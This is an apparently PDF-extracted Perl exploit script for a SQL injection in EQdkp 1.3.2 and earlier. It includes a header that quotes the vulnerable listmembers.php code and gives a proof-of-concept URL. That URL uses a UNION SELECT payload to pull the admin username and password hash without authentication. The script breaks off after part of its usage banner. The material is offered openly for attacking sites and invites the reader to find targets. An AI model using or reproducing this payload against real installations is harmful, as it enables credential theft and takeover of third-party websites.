1 #!/usr/bin/perl −w
2
3 #################################################################################
4 #
#
5 #
EQdkp <= 1.3.2 SQL Injection Exploit
#
6 #
#
7 # Discovered by: Silentz
#
8 # Payload: Admin Username & Hash Retrieval
#
9 # Website: http://www.w4ck1ng.com
#
10 #
#
11 # Vulnerable Code (listmembers.php):
#
12 #
#
13 # $sql = ’SELECT m.*, (m.member_earned−m.member_spent+m.member_adjustment)
#
14 # AS member_current, member_status, r.rank_name, r.rank_hide, r.rank_prefix, #
15 # r.rank_suffix, c.class_name AS member_class, c.class_armor_type AS
#
16 # armor_type, c.class_min_level AS min_level, c.class_max_level AS max_level
#
17 # FROM ’ . MEMBERS_TABLE . ’ m, ’ . MEMBER_RANKS_TABLE . ’ r, ’ . CLASS_TABLE #
18 # . ’ c WHERE c.class_id = m.member_class_id AND (m.member_rank_id =
#
19 # r.rank_id)’;
#
20 #
#
21 #
if ( !empty($_GET[’rank’]) )
#
22 # {
#
23 # $sql .= " AND r.rank_name=’" . urldecode($_GET[’rank’]) . "’";
#
24 # }
#
25 #
#
26 # PoC: http://victim.com/listmembers.php?show=all&rank=%2527 UNION SELECT
#
27 # 0,username,0,0,0,0,0,0,0,0,0,0,0,0,0,user_password,0,NULL,NULL,0,0,0,0 #
28 # FROM eqdkp_users where user_id=1/*
#
29 #
#
30 # Subject To: Nothing, no authentication...nada!
#
31 # GoogleDork: Get your own!
#
32 #
#
33 # Shoutz: The entire w4ck1ng community
#
34 #
#
35 #################################################################################
36
37 use LWP::UserAgent;
38 if (@ARGV < 1){
39 print "−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−\r\n";
40 print " EQdkp <= 1.3.2 SQL Injection Exploit\r\n";
41 print "−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−\r\n";
42 print "Usage: w4ck1ng_eqdkp.pl [PATH]\r\n\r\n";
43 print "[PATH] = Path where EQdkp is located\r\n\r\n";
44 print "e.g. w4ck1ng_eqdkp.pl http://victim.com/eqdkp/\r\n";
45 print "−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−\r\n";
46 print "
http://www.w4ck1ng.